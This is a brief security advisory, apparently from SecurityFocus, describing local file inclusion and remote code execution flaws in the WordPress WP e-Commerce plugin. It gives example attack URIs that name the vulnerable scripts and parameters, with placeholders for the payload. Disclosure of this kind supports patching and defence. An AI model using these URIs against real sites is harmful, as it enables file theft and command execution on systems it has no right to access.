WordPress WP e-Commerce Plugin Multiple Security Vulnerabilities

An attacker can exploit these issues using a web browser.

The following example URIs are available:

Local file-include
http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI]

Remote code-execution
http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD]
http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD]


 

Privacy Statement
Copyright 2010, SecurityFocus